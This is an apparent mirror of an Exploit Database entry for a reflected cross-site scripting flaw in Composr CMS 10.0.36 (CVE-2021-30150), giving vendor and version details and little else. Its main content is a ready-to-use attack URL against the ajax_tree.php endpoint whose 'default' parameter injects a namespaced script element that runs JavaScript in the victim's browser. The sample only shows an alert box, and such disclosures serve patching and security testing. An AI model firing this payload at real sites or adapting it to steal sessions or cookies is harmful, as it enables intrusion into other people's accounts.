Composr CMS 10.0.36 – Cross Site Scripting

• Exploit Database
• 42 阅读

• 作者： Orion Hridoy
  日期： 2021-04-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49749/

• # Exploit Title: Composr CMS 10.0.36 - Cross Site Scripting
  # Date: 04/06/2021
  # Exploit Author: Orion Hridoy
  # Vendor Homepage: https://compo.sr/
  # Software Link: https://compo.sr/download.htm
  # Version: 10.0.36
  # Tested on: Windows/Linux
  # CVE : CVE-2021-30150
  
  Vulnerable Endpoint:
  https://site.com/data/ajax_tree.php?hook=choose_gallery&id=&options=a:5:{s:21:"must_accept_something";b:1;s:6:"purity";b:0;s:14:"addable_filter";b:1;s:6:"filter";N;s:9:"member_id";N;}&default=<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert("Hello")</something:script>